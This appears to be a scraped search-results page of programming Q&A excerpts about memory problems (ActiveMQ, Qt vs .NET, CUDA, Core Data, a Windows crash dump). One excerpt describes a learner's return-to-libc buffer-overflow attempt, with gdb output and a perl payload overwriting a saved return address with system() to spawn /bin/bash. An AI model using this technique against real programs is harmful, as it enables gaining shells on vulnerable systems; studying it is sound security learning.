Search Results

Search found 12267 results on 491 pages for 'out of memory'.

Page 212/491 | < Previous Page | 208 209 210 211 212 213 214 215 216 217 218 219  | Next Page >

  • ActiveMQ 5.2.0 + REST + HTTP POST = java.lang.OutOfMemoryError

    - by Bruce Loth
    First off, I am a newbie when it comes to JMS & ActiveMQ. I have been looking into a messaging solution to serve as middleware for a message producer that will insert XML messages into a queue via HTTP POST. The producer is an existing system written in C++ that cannot be modified (so Java and the C++ API are out). Using the "demo" examples and some trial and error, I have cobbled together a working example of what I want to do (on a windows box). The web.xml I configured in a test directory under "webapps" specifies that the HTTP POST messages received from the producer are to be handled by the MessageServlet. I added a line for the text app in "activemq.xml" ('ow' is the test app dir): I created a test script to "insert" messages into the queue which works well. The problem I am running into is that it as I continue to insert messages via REST/HTTP POST, the memory consumption and thread count used by ActiveMQ continues to rise (It happens when I have timely consumers as well as slow or non-existent consumers). When memory consumption gets around 250MB's and the thread count exceeds 5000 (as shown in windows task manager), ActiveMQ crashes and I see this in the log: Exception in thread "ActiveMQ Transport Initiator: vm://localhost#3564" java.lang.OutOfMemoryError: unable to create new native thread It is as if Jetty is spawning a new thread to handle each HTTP POST and the thread never dies. I did look at this page: http://activemq.apache.org/javalangoutofmemory.html and tried but that didn't fix the problem (although I didn't fully understand the implications of the change either). Does anyone have any ideas? Thanks! Bruce Loth PS - I included the "test message producer" python script below for what it is worth. I created batches of 100 messages and continued to run the script manually from the command line while watching the memory consumption and thread count of ActiveMQ in task manager. def foo(): import httplib, urllib body = "<?xml version='1.0' encoding='UTF-8'?>\n \ <ROOT>\n \ [snip: xml deleted to save space] </ROOT>" headers = {"content-type": "text/xml", "content-length": str(len(body))} conn = httplib.HTTPConnection("127.0.0.1:8161") conn.request("POST", "/ow/message/RDRCP_Inbox?type=queue", body, headers) response = conn.getresponse() print response.status, response.reason data = response.read() conn.close() ## end method definition ## Begin test code count = 0; while(count < 100): # Test with batches of 100 msgs count += 1 foo()

    Read the article

  • QT vs. Net - REAL comparisons for R.A.D. projects

    - by Pirate for Profit
    Man in all these Qt vs. .NET discussions 90% these people argue about the dumbest crap. Trying to get a real comparison chart here, because I know a little about both frameworks but I don't know everything. I believe Qt and .NET both have strengths and weaknesses. This is to make a comparison that highlights these so people can make more informed decisions before embarking on a project, in the spirit of R.A.D. Event Handling In Qt the event handling system is very simple. You just emit signals when something cool happens and then catch them in slots. ie. // run some calculations, then emit valueChanged(30, false, 20.2); and then catching it, any object can make a slot to recieve that message easily void MyObj::valueChanged(int percent, bool ok, float timeRemaining). It's easy to "block" an event or "disconnect" when needed, and works seamlessly across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way the .NET event handling is set up (you know, void valueChanged(object sender, CustomEventArgs e). And I'm not just talking about syntax, because in the end the .NET anonymous delegates are the bomb. I'm also talking about in more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about in the way the system feels to a human being. Qt wins hands down for the simplest yet still flexible event handling system ever i m o. Plugins and such I do love some of the ease of C# compared to C++, as well as .NET's assembly architecture, even though it leads to a bunch of .dll's (there's ways to combine everything into a single exe though). That is a big bonus for modular projects, which are a PITA to import stuff in C++ as far as RAD is concerned. Database Ease of Doing Crap Also what about datasets and database manipulations. I think .net wins here but I'm not sure. Threading/Conccurency How do you guys think of the threading? In .NET, all I've ever done is make like a list of master worker threads with locks. I like QConcurrentFramework, you don't worry about locks or anything, and with the ease of the signal slot system across threads it's nice to get notified about the progress of things. QConcurrent is the simplest threading mechanism I've ever played with. Memory Usage Also what do you think of the overall memory usage comparison. Is the .NET garbage collector pretty on the ball and quick compared to the instantaneous nature of native memory management? Or does it just let programs leak up a storm and lag the computer then clean it up when it's about to really lag? Doesn't the just-in-time compiler make native code that is pretty good, like and that only happens the first time the program is run? However, I am a n00b who doesn't know what I'm talking about, please school me on the subject.

    Read the article

  • Problem with return 2 libc method

    - by jth
    Hi, I'am trying to understand the return2libc method. I'am using an ubuntu linux 9.10, 32 bit with ASLR disabled. In theory, it sounds quite easy, overwrite the saved eip with the address of system() (or whatever function you want), then put the address to which system() should return and after that, the parameter for system, the "/bin/bash"-string. But what happens is that my exploit keeps segfaulting the vulnerable program. I assume something with the system()-address went wrong. This is what I did so far: Determined the address of system(): (gdb) print system $1 = {<text variable, no debug info>} 0x167020 <system> (gdb) x/x system 0x167020 <system>: 0x890cec83 I used the subsequent x/x system because those 3 bytes returned by print system looks like an index in some sort of jumptable (PLT?), so I assume 0x890cec83 is the right address which is used to overwrite the saved eip. After that I determined the address of the /bin/bash string in memory, using a small C program which basically consists of this line: printf("Address of string /bin/bash: %p\n", getenv("SHELL")); Then I looked a little bit around in the memory and fount /bin/bash: (gdb) x/s 0xbffff6ca 0xbffff6ca: "/bin/bash" After I gathered this information, I filled the buffer: (gdb) b 9 Breakpoint 1 at 0x8048407: file victim.c, line 9. (gdb) r `perl -e 'print "A"x9 . "\x83\xec\x0c\x89FAKE\xca\f6\ff\bf";'` Breakpoint 1, main (argc=1111638594, argv=0xc360cca) at victim.c:10 10 return 0; (gdb) x/s 0xbffff6ca 0xbffff6ca: "/bin/bash" Stack frame looks like this: (gdb) i f Stack level 0, frame at 0xbffff440: eip = 0x8048407 in main (victim.c:10); saved eip 0x890cec83 source language c. Arglist at 0xbffff438, args: argc=1111638594, argv=0xc360cca Locals at 0xbffff438, Previous frame's sp is 0xbffff440 Saved registers: ebp at 0xbffff438, eip at 0xbffff43c This seems all right to me, saved eip was overwritten with the (hopefully) correct system()-address, return address for system was set to "FAKE" (shouldn't matter) and the address of /bin/bash also seems to be correct. When I'am continuing the execution, victim segfaults on some strange address and certainly not in 0x890cec83: (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0804840d in main (argc=Cannot access memory at address 0x41414149 ) at victim.c:11 11 } Has anyone an explanation or a hint what happens here and why the execution isn't redirected to 0x890cec83? Thanks in advance, any hint, and be it only vague, would be appreciated. I have no idea why this doesn't work.

    Read the article

  • Qt vs .NET - a few comparisons [closed]

    - by Pirate for Profit
    Event Handling In Qt the event handling system you just emit signals when something cool happens and then catch them in slots, for instance emit valueChanged(int percent, bool something); and void MyCatcherObj::valueChanged(int p, bool ok){} blocking them and disconnecting them when needed, doing it across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way the .NET event handling is set up (you know, object sender, CustomEventArgs e). And I'm not just talking about syntax, because in the end the .NET delegate crap is the bomb. I'm also talking about in more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about in the way the system feels to a human being. Qt wins hands down i m o. Basically, the footprints make more sense and you can visualize the project easier without the clunky event handling system. I wish I could it explain it better. The only thing is, I do love some of the ease of C# compared to C++ and .NET's assembly architecture. That is a big bonus for modular projects, which are a PITA to do in C++. Database Ease of Doing Crap Also what about datasets and database manipulations. I think .net wins here but I'm not sure. Threading/Conccurency How do you guys think of the threading? In .NET, all I've ever done is make like a list of master worker threads with locks. I like QConcurrentFramework, you don't worry about locks or anything, and with the ease of the signal slot system across threads it's nice to get notified about the progress of things. Memory Usage Also what do you think of the overall memory usage comparison. Is the .NET garbage collector pretty on the ball and quick compared to the instantaneous nature of native memory management? Or does it just let programs leak up a storm and lag the computer then clean it up when it's about to really lag? However, I am a n00b who doesn't know what I'm talking about, please school me on the subject.

    Read the article

  • Google Toolbox For Mac with Core Data on iPhone results in error

    - by JaanusSiim
    I have set up my project for using Google Toolbox for Mac as described on official wiki. And everything is working as expected. For core data usage I have created a 'database' class that uses for final application SQLite storage (this is done based on Xcode template code). For unit tests I have created separate init method for 'database' to use in memory storage (storage url is [NSURL URLWithString:@"memory://store"] and type NSInMemoryStoreType). Without adding my model file (*.xcdatamodel) to unit tests target, test fail in expected place with message: executeFetchRequest:error: A fetch request must have an entity. If I add model file to the test target, then test is executed as expected (core data part looks OK), but after tests execution I get: RunIPhoneUnitTest.sh: line 123: 9487 Segmentation fault "$TARGET_BUILD_DIR/$EXECUTABLE_PATH" -RegisterForSystemEvents Command /bin/sh failed with exit code 139 This problem does not looks directly related to core data, but only happens if model file is added to target. Any pointers on resolving this issue would be appreciated!

    Read the article

  • binary search and trio

    - by user121196
    given a large list of alphabetically sorted words in a file,I need to write a program that, given a word x, determines if x is in the list. priorties: 1. speed. 2. memory I already know I can use (n is number of words, m is average length of the words) 1. a tri, time is O(log(n)), space(best case) is O(log(n*m)), space(worst case) is O(n*m). 2. load the complete list into memory, then binary search, time is O(log(n)), space is O(n*m) I'm not sure about the complexity on tri, please correct me if they are wrong. Also are there other good approaches?

    Read the article

  • While loop in IL - why stloc.0 and ldloc.0?

    - by Michael Stum
    I'm trying to understand how a while loop looks in IL. I have written this C# function: static void Brackets() { while (memory[pointer] > 0) { // Snipped body of the while loop, as it's not important } } The IL looks like this: .method private hidebysig static void Brackets() cil managed { // Code size 37 (0x25) .maxstack 2 .locals init ([0] bool CS$4$0000) IL_0000: nop IL_0001: br.s IL_0012 IL_0003: nop // Snipped body of the while loop, as it's not important IL_0011: nop IL_0012: ldsfld uint8[] BFHelloWorldCSharp.Program::memory IL_0017: ldsfld int16 BFHelloWorldCSharp.Program::pointer IL_001c: ldelem.u1 IL_001d: ldc.i4.0 IL_001e: cgt IL_0020: stloc.0 IL_0021: ldloc.0 IL_0022: brtrue.s IL_0003 IL_0024: ret } // end of method Program::Brackets For the most part this is really simple, except for the part after cgt. What I don't understand is the local [0] and the stloc.0/ldloc.0. As far as I see it, cgt pushes the result to the stack, stloc.0 gets the result from the stack into the local variable, ldloc.0 pushes the result to the stack again and brtrue.s reads from the stack. What is the purpose of doing this? Couldn't this be shortened to just cgt followed by brtrue.s?

    Read the article

  • server|configuration problem, a php script just die with no error log & no reason

    - by Roberto
    Hi (first of all, thanks for your attention & sorry for my bad english hahaha also this is not a programming error, or thats what I think, I think this is an error in some configuration of the server or something else but I dont know what) I have a php script (is running like a process of linux, its not running on the web browser) that send SMS via SMPP on the port 2055 (using sockets in php) & then inserts like 10,000 rows into a dababase on MySQL, the script gets the data from a XML file; firts it was running in a shared server (Hostgator is our hosting provider) & at the begining it worked fine, with no trouble, but 5 months later an error appear, the process just die with no reason, the script only sent & inserted 700 rows in the table of the database & the process didnt show any warning or error, nothing appears in the error logs, & I didnt make any change in the script Hostgator never helped us hahaha so we decided to move the script from the shared server to a dedicated server; I thought it was a memory problem or something like that, but when we move the script to the dedicated server the problem just get worse, the script die when has just sent & inserted 40 to 50 rows to the database the information about this error: the shared server is on Red Hat 4.1.2-46 & the dedicated server is on CentOS 5.4 I have commented the line that sends the SMS, & the problem remains in the shared server, at the begining the script was fine, but then the script started to die when has just inserted 700 aprox. in the database, & now the script is dying when has inserted 2500 rows, its better but we didnt change anything in the dedicated server, the script dies when has just inserted like 40 row in the table the script, before it dies, change to a zombie process & we dont know why the usage of memory appears to be 0.3%, and of the cpu appears to be 0.7% to 1% I have changed the max memory limit of php to 128Mb, and even to -1 (so php wont have any limit) but the problem remains we have the limit of 50 connections of mysql at the same time, so I think this is not the problem Im using mysqli to connect from php to mysql Hostgator report that they haven't made any change or update in the servers what could be the problem?? what should I do??? what should I search??? is something in the logic Im missing?? what steps do I have to follow when managing & searching problems of process on Linux??? thank you very much, I think this is not a programming problem, but you have more experience than me, you can tell me thanks!!! bye!!! :)

    Read the article

  • How/is data shared between fastCGI processes?

    - by Josh the Goods
    I've written a simple perl script that I'm running via fastCGI on Apache. The application loads a set of XML data files which are used to lookup values based upon the the query parameters of an incoming request. As I understand it, if I want to increase the amount of concurrent requests my application can handle I need to allow fastCGI to spawn multiple processes. Will each of these processes have to hold duplicate copies of the XML data in memory? Is there a way to set things up so that I can have one copy of the XML data loaded in memory while increasing the capacity to handle concurrent requests?

    Read the article

  • Penalty of using QGraphicsObject vs QGraphicsItem?

    - by Dutch
    I currently have a hierarchy of items based off of QGraphicsItem. I want to move to QGraphicsObject instead so that I can put properties on my items. I will not be making use of signals/slots or any other features of QObject. I'm told that you shouldn't derive from QObject because it's "heavy" and "slow". To test the impact, I derive from QGraphicsObject, add a couple properties to my items, and look at the memory usage of the running app. I create 1000 items using both flavors and I don't notice anything more than 10k more memory usage. Since all I am adding on to my items are properties, is it safe to say that QObject only adds weight if you are using signals/slots?

    Read the article

  • Iphone App Similar to the Talking Larry Application

    - by Zeeshan
    I am developing iphone application similar to the Talking Larry Application. I am facing an issue of Low Memory when i pre-load the animations into an NSMutable Array. If i do not pre-load the animations and load it into the Animation Images when the user touch the button then it takes Time and it play back the animation very Slow. And during video making it does not play the complete animations. How can i resolve this issue. I want to play back the animations similar to the Talking Larry app and do not want to get Low Memory Issue.

    Read the article

  • Question about "Link Map" output and "Assume" directive of MASM assembler.

    - by smwikipedia
    I am new to MASM. So the questions may be quite basic. When I am using the MASM assembler, there's an output file called "Link Map". Its content is composed of the starting offset and length of various segments, such as Data segment, Code segment and Stack segment. I am wondering that, where are these information describing? Are they talking about how various segments are located within an EXE file or, how segments are located within memory after the EXE file being loaded into memory by a program loader? BTW: What does the "Assume" directive do? My understanding is that it tell the assembler to emit some information into the exe file header so the program loader could use it to set DS, CS, SS, ES register accordingly. Am I right on this? Thanks in advance.

    Read the article

  • Is it possible to implement a GC.GetAliveInstancesOf<T>() (for use in debugging)?

    - by Omer Raviv
    Hi, I know this was answered before, but I'd like to pose a somewhat different question. Is there any conceivable way to implement GC.GetAliveInstancesOf(), that can be evaluated in Visual Studio Debug Watch window? Sasha Goldstein shows one solution in this article, but it requires every class you want to query inherit from a specific base class. I'll emphasize that I only want to use this method during debugging, so I don't care that the GC may change an object's address in memory during runtime. One idea might be to somehow harness the !dumpheap –type command of SOS, and do some magic trick to create a temporary variable and have it point out to the memory address printed by SOS. Does anyone have a solution that works?

    Read the article

  • Where to start when programming process synchronization algorithms like clone/fork, semaphores

    - by David
    I am writing a program that simulates process synchronization. I am trying to implement the fork and semaphore techniques in C++, but am having trouble starting off. Do I just create a process and send it to fork from the very beginning? Is the program just going to be one infinite loop that goes back and forth between parent/child processes? And how do you create the idea of 'shared memory' in C++, explicit memory address or just some global variable? I just need to get the overall structure/idea of the flow of the program. Any references would be appreciated.

    Read the article

  • Programmatic resource monitoring per process in Linux

    - by tuxx
    Hi, I want to know if there is an efficient solution to monitor a process resource consumption (cpu, memory, network bandwidth) in Linux. I want to write a daemon in C++ that does this monitoring for some given PIDs. From what I know, the classic solution is to periodically read the information from /proc, but this doesn't seem the most efficient way (it involves many system calls). For example to monitor the memory usage every second for 50 processes, I have to open, read and close 50 files (that means 150 system calls) every second from /proc. Not to mention the parsing involved when reading these files. Another problem is the network bandwidth consumption: this cannot be easily computed for each process I want to monitor. The solution adopted by NetHogs involves a pretty high overhead in my opinion: it captures and analyzes every packet using libpcap, then for each packet the local port is determined and searched in /proc to find the corresponding process. Do you know if there are more efficient alternatives to these methods presented or any libraries that deal with this problems?

    Read the article

  • create a list of threads in C

    - by Hristo
    My implementation (in C) isn't working... the first node is always NULL so I can't free the memory. I'm doing: thread_node_t *thread_list_head = NULL; // done in the beginning of the program ... // later on in the program thread_node_t *thread = (thread_node_t*) malloc(sizeof(thread_node_t)); pthread_create(&(thread->thread), NULL, client_thread, &csFD); thread->next = thread_list_head; thread_list_head = thread; So when I try to free this memory, thread_list_head is NULL. while (thread_list_head != NULL) { thread_node_t *temp = thread_list_head; thread_list_head = thread_list_head->next; free(temp); temp = NULL; } Any advice on how to fix this or just a new way to create this list that would work better? Thanks, Hristo

    Read the article

  • Some basic COM question...

    - by smwikipedia
    I have just finished my first COM server DLL. And it runs smoothly. So I'd like to show my understanding for now and hear your critics. 1- How COM simply works? COM - "The Call Chain" COM Lib methods - Traditional DLL exports - Classes encapsulated in the COM DLL 2- With C++, the benefits like "interface" in OOP can only be taken advantage of at the source level. With COM, these benefits can be used at a binary level. 3- Some illustration about interface &pInterface ------- pInterface ---------- Interface----------------- methods Ixx ** Ixx * (method table) (void **) A Interface is a data structure in memory. It's nothing but a memory area containg a method table. Is my understanding alright? Thanks for your revision.

    Read the article

  • cuda/thrust: Trying to sort_by_key 2.8GB of data in 6GB of gpu RAM throws bad_alloc

    - by Sven K
    I have just started using thrust and one of the biggest issues I have so far is that there seems to be no documentation as to how much memory operations require. So I am not sure why the code below is throwing bad_alloc when trying to sort (before the sorting I still have 50% of GPU memory available, and I have 70GB of RAM available on the CPU)--can anyone shed some light on this? #include <thrust/device_vector.h> #include <thrust/sort.h> #include <thrust/random.h> void initialize_data(thrust::device_vector<uint64_t>& data) { thrust::fill(data.begin(), data.end(), 10); } #define BUFFERS 3 int main(void) { size_t N = 120 * 1024 * 1024; char line[256]; try { std::cout << "device_vector" << std::endl; typedef thrust::device_vector<uint64_t> vec64_t; // Each buffer is 900MB vec64_t c[3] = {vec64_t(N), vec64_t(N), vec64_t(N)}; initialize_data(c[0]); initialize_data(c[1]); initialize_data(c[2]); std::cout << "initialize_data finished... Press enter"; std::cin.getline(line, 0); // nvidia-smi reports 48% memory usage at this point (2959MB of // 6143MB) std::cout << "sort_by_key col 0" << std::endl; // throws bad_alloc thrust::sort_by_key(c[0].begin(), c[0].end(), thrust::make_zip_iterator(thrust::make_tuple(c[1].begin(), c[2].begin()))); std::cout << "sort_by_key col 1" << std::endl; thrust::sort_by_key(c[1].begin(), c[1].end(), thrust::make_zip_iterator(thrust::make_tuple(c[0].begin(), c[2].begin()))); } catch(thrust::system_error &e) { std::cerr << "Error: " << e.what() << std::endl; exit(-1); } return 0; }

    Read the article

  • Texture allocations being doubled in iPhone OpenGL ES

    - by Kyle
    The below couple lines are called 15 times during initialization. The tx-size is reported at 512 everytime, so this will allocate a 1mb image in memory 15 times, for a total of 15mb used.. However, I noticed instruments is reporting a total of 31 allocations! (15*2)+1 glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, tx-size, tx-size, 0, GL_RGBA, GL_UNSIGNED_BYTE, spriteData); free(spriteData); Likewise in another area of my program that allocates 6 256x256x4 (256kB) textures.. I see 13 sitting there. (6*2)+1 Anyone know what's going on here? It seems like awful memory management, and I really hope it's my fault. Just to let everyone know, I'm on the simulator.

    Read the article

  • CUDA threads output different value

    - by kar
    HAi, I wrote a cuda program , i have given the kernel function below. The device memory is allocated through CUDAMalloc(); the value of *md is 10; __global__ void add(int *md) { int x,oper=2; x=threadIdx.x; * md = *md*oper; if(x==1) { *md = *md*0; } if(x==2) { *md = *md*10; } if(x==3) { *md = *md+1; } if(x==4) { *md = *md-1; } } executed the above code add<<<1,5>>(*md) , add<<<1,4>>>(*md) for <<<1,5>>> the output is 19 for <<<1,4>>> the output is 21 1) I have doubt that cudaMalloc() will allocate in device main memory? 2) Why the last thread alone is executed always in the above program? Thank you

    Read the article

  • Server 2003 SP2 BSOD caused by fltmgr.sys

    - by MasterMax1313
    I'm running into a problem where a Server 2003 SP2 box has started crashing roughly once an hour, BSODing out with the message that fltmgr.sys is probably the cause. I ran dumpchk.exe on the memory.dmp file, indicating the same thing. Any thoughts on typical root causes? The following is the error code I'm seeing: Error code 0000007e, parameter1 c0000005, parameter2 f723e087, parameter3 f78cea8c, parameter4 f78ce788. After running dumpchk on the memory.dmp file, I get the following note: Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) The full log is here: Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [c:\windows\memory.dmp] Kernel Complete Dump File: Full address space is available Symbol search path is: *** Invalid *** **************************************************************************** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * **************************************************************************** Executable search path is: ********************************************************************* * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ********************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrnlpa.exe - Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible Product: Server, suite: TerminalServer SingleUserTS Built by: 3790.srv03_sp2_gdr.101019-0340 Machine Name: Kernel base = 0x80800000 PsLoadedModuleList = 0x8089ffa8 Debug session time: Wed Oct 5 08:48:04.803 2011 (UTC - 4:00) System Uptime: 0 days 14:25:12.085 ********************************************************************* * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y <symbol_path> argument when starting the debugger. * * using .sympath and .sympath+ * ********************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrnlpa.exe - Loading Kernel Symbols ............................................................... ................................................. Loading User Symbols Loading unloaded module list ... ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 7E, {c0000005, f723e087, f78dea8c, f78de788} ***** Kernel symbols are WRONG. Please fix symbols to do analysis. *** ERROR: Symbol file could not be found. Defaulted to export symbols for fltmgr.sys - --omitted-- Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) Followup: MachineOwner --------- ----- 32 bit Kernel Full Dump Analysis DUMP_HEADER32: MajorVersion 0000000f MinorVersion 00000ece KdSecondaryVersion 00000000 DirectoryTableBase 004e7000 PfnDataBase 81600000 PsLoadedModuleList 8089ffa8 PsActiveProcessHead 808a61c8 MachineImageType 0000014c NumberProcessors 00000001 BugCheckCode 0000007e BugCheckParameter1 c0000005 BugCheckParameter2 f723e087 BugCheckParameter3 f78dea8c BugCheckParameter4 f78de788 PaeEnabled 00000001 KdDebuggerDataBlock 8088e3e0 SecondaryDataState 00000000 ProductType 00000003 SuiteMask 00000110 Physical Memory Description: Number of runs: 3 (limited to 3) FileOffset Start Address Length 00001000 0000000000001000 0009e000 0009f000 0000000000100000 bfdf0000 bfe8f000 00000000bff00000 00100000 Last Page: 00000000bff8e000 00000000bffff000 KiProcessorBlock at 8089f300 1 KiProcessorBlock entries: ffdff120 Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible Product: Server, suite: TerminalServer SingleUserTS Built by: 3790.srv03_sp2_gdr.101019-0340 Machine Name:*** ERROR: Module load completed but symbols could not be loaded for srv.sys Kernel base = 0x80800000 PsLoadedModuleList = 0x8089ffa8 Debug session time: Wed Oct 5 08:48:04.803 2011 (UTC - 4:00) System Uptime: 0 days 14:25:12.085 start end module name 80800000 80a50000 nt Tue Oct 19 10:00:49 2010 (4CBDA491) 80a50000 80a6f000 hal Sat Feb 17 00:48:25 2007 (45D69729) b83d4000 b83fe000 Fastfat Sat Feb 17 01:27:55 2007 (45D6A06B) b8476000 b84a1000 RDPWD Sat Feb 17 00:44:38 2007 (45D69646) b8549000 b8554000 TDTCP Sat Feb 17 00:44:32 2007 (45D69640) b8fe1000 b9045000 srv Thu Feb 17 11:58:17 2011 (4D5D53A9) b956d000 b95be000 HTTP Fri Nov 06 07:51:22 2009 (4AF41BCA) b9816000 b982d780 hgfs Tue Aug 12 20:36:54 2008 (48A22CA6) b9b16000 b9b20000 ndisuio Sat Feb 17 00:58:25 2007 (45D69981) b9cf6000 b9d1ac60 iwfsd Wed Sep 29 01:43:59 2004 (415A4B9F) b9e5b000 b9e62000 parvdm Tue Mar 25 03:03:49 2003 (3E7FFF55) b9e63000 b9e67860 lgtosync Fri Sep 12 04:38:13 2003 (3F6185F5) b9ed3000 b9ee8000 Cdfs Sat Feb 17 01:27:08 2007 (45D6A03C) b9f10000 b9f2e000 EraserUtilRebootDrv Thu Jul 07 21:45:11 2011 (4E166127) b9f2e000 b9f8c000 eeCtrl Thu Jul 07 21:45:11 2011 (4E166127) b9f8c000 b9f9d000 Fips Sat Feb 17 01:26:33 2007 (45D6A019) b9f9d000 ba013000 mrxsmb Fri Feb 18 10:22:23 2011 (4D5E8EAF) ba013000 ba043000 rdbss Wed Feb 24 10:54:03 2010 (4B854B9B) ba043000 ba0ad000 SPBBCDrv Mon Dec 14 23:39:00 2009 (4B2712E4) ba0ad000 ba0d7000 afd Thu Feb 10 08:42:18 2011 (4D53EB3A) ba0d7000 ba108000 netbt Sat Feb 17 01:28:57 2007 (45D6A0A9) ba108000 ba19c000 tcpip Sat Aug 15 05:53:38 2009 (4A8685A2) ba19c000 ba1b5000 ipsec Sat Feb 17 01:29:28 2007 (45D6A0C8) ba275000 ba288600 NAVENG Fri Jul 29 08:10:02 2011 (4E32A31A) ba289000 ba2ae000 SYMEVENT Thu Apr 15 21:31:23 2010 (4BC7BDEB) ba2ae000 ba42d300 NAVEX15 Fri Jul 29 08:07:28 2011 (4E32A280) ba42e000 ba479000 SRTSP Fri Mar 04 15:31:08 2011 (4D714C0C) ba485000 ba487b00 dump_vmscsi Wed Apr 11 13:55:32 2007 (461D2114) ba4e1000 ba540000 update Mon May 28 08:15:16 2007 (465AC7D4) ba568000 ba59f000 rdpdr Sat Feb 17 00:51:00 2007 (45D697C4) ba59f000 ba5b1000 raspptp Sat Feb 17 01:29:20 2007 (45D6A0C0) ba5b1000 ba5ca000 ndiswan Sat Feb 17 01:29:22 2007 (45D6A0C2) ba5da000 ba5e4000 dump_diskdump Sat Feb 17 01:07:44 2007 (45D69BB0) ba66a000 ba67e000 rasl2tp Sat Feb 17 01:29:02 2007 (45D6A0AE) ba67e000 ba69a000 VIDEOPRT Sat Feb 17 01:10:30 2007 (45D69C56) ba69a000 ba6c1000 ks Sat Feb 17 01:30:40 2007 (45D6A110) ba6c1000 ba6d5000 redbook Sat Feb 17 01:07:26 2007 (45D69B9E) ba6d5000 ba6ea000 cdrom Sat Feb 17 01:07:48 2007 (45D69BB4) ba6ea000 ba6ff000 serial Sat Feb 17 01:06:46 2007 (45D69B76) ba6ff000 ba717000 parport Sat Feb 17 01:06:42 2007 (45D69B72) ba717000 ba72a000 i8042prt Sat Feb 17 01:30:40 2007 (45D6A110) baff0000 baff3700 CmBatt Sat Feb 17 00:58:51 2007 (45D6999B) bf800000 bf9d3000 win32k Thu Mar 03 08:55:02 2011 (4D6F9DB6) bf9d3000 bf9ea000 dxg Sat Feb 17 01:14:39 2007 (45D69D4F) bf9ea000 bf9fec80 vmx_fb Sat Aug 16 07:23:10 2008 (48A6B89E) bf9ff000 bfa4a000 ATMFD Tue Feb 15 08:19:22 2011 (4D5A7D5A) bff60000 bff7e000 RDPDD Sat Feb 17 09:01:19 2007 (45D70AAF) f7214000 f723a000 KSecDD Mon Jun 15 13:45:11 2009 (4A3688A7) f723a000 f725f000 fltmgr Sat Feb 17 00:51:08 2007 (45D697CC) f725f000 f7272000 CLASSPNP Sat Feb 17 01:28:16 2007 (45D6A080) f7272000 f7283000 symmpi Mon Dec 13 16:03:14 2004 (41BE0392) f7283000 f72a2000 SCSIPORT Sat Feb 17 01:28:41 2007 (45D6A099) f72a2000 f72bf000 atapi Sat Feb 17 01:07:34 2007 (45D69BA6) f72bf000 f72e9000 volsnap Sat Feb 17 01:08:23 2007 (45D69BD7) f72e9000 f7315000 dmio Sat Feb 17 01:10:44 2007 (45D69C64) f7315000 f733c000 ftdisk Sat Feb 17 01:08:05 2007 (45D69BC5) f733c000 f7352000 pci Sat Feb 17 00:59:03 2007 (45D699A7) f7352000 f7386000 ACPI Sat Feb 17 00:58:47 2007 (45D69997) f7487000 f7490000 WMILIB Tue Mar 25 03:13:00 2003 (3E80017C) f7497000 f74a6000 isapnp Sat Feb 17 00:58:57 2007 (45D699A1) f74a7000 f74b4000 PCIIDEX Sat Feb 17 01:07:32 2007 (45D69BA4) f74b7000 f74c7000 MountMgr Sat Feb 17 01:05:35 2007 (45D69B2F) f74c7000 f74d2000 PartMgr Sat Feb 17 01:29:25 2007 (45D6A0C5) f74d7000 f74e7000 disk Sat Feb 17 01:07:51 2007 (45D69BB7) f74e7000 f74f3000 Dfs Sat Feb 17 00:51:17 2007 (45D697D5) f74f7000 f7501000 crcdisk Sat Feb 17 01:09:50 2007 (45D69C2E) f7507000 f7517000 agp440 Sat Feb 17 00:58:53 2007 (45D6999D) f7517000 f7522000 TDI Sat Feb 17 01:01:19 2007 (45D69A2F) f7527000 f7532000 ptilink Sat Feb 17 01:06:38 2007 (45D69B6E) f7537000 f7540000 raspti Sat Feb 17 00:59:23 2007 (45D699BB) f7547000 f7556000 termdd Sat Feb 17 00:44:32 2007 (45D69640) f7557000 f7561000 Dxapi Tue Mar 25 03:06:01 2003 (3E7FFFD9) f7577000 f7580000 mssmbios Sat Feb 17 00:59:12 2007 (45D699B0) f7587000 f7595000 NDProxy Wed Nov 03 09:25:59 2010 (4CD162E7) f75a7000 f75b1000 flpydisk Tue Mar 25 03:04:32 2003 (3E7FFF80) f75b7000 f75c0080 SRTSPX Fri Mar 04 15:31:24 2011 (4D714C1C) f75d7000 f75e3000 vga Sat Feb 17 01:10:30 2007 (45D69C56) f75e7000 f75f2000 Msfs Sat Feb 17 00:50:33 2007 (45D697A9) f75f7000 f7604000 Npfs Sat Feb 17 00:50:36 2007 (45D697AC) f7607000 f7615000 msgpc Sat Feb 17 00:58:37 2007 (45D6998D) f7617000 f7624000 netbios Sat Feb 17 00:58:29 2007 (45D69985) f7627000 f7634000 wanarp Sat Feb 17 00:59:17 2007 (45D699B5) f7637000 f7646000 intelppm Sat Feb 17 00:48:30 2007 (45D6972E) f7647000 f7652000 kbdclass Sat Feb 17 01:05:39 2007 (45D69B33) f7657000 f7661000 mouclass Tue Mar 25 03:03:09 2003 (3E7FFF2D) f7667000 f7671000 serenum Sat Feb 17 01:06:44 2007 (45D69B74) f7677000 f7682000 fdc Sat Feb 17 01:07:16 2007 (45D69B94) f7687000 f7694b00 vmx_svga Sat Aug 16 07:22:07 2008 (48A6B85F) f7697000 f76a0000 watchdog Sat Feb 17 01:11:45 2007 (45D69CA1) f76a7000 f76b0000 ndistapi Sat Feb 17 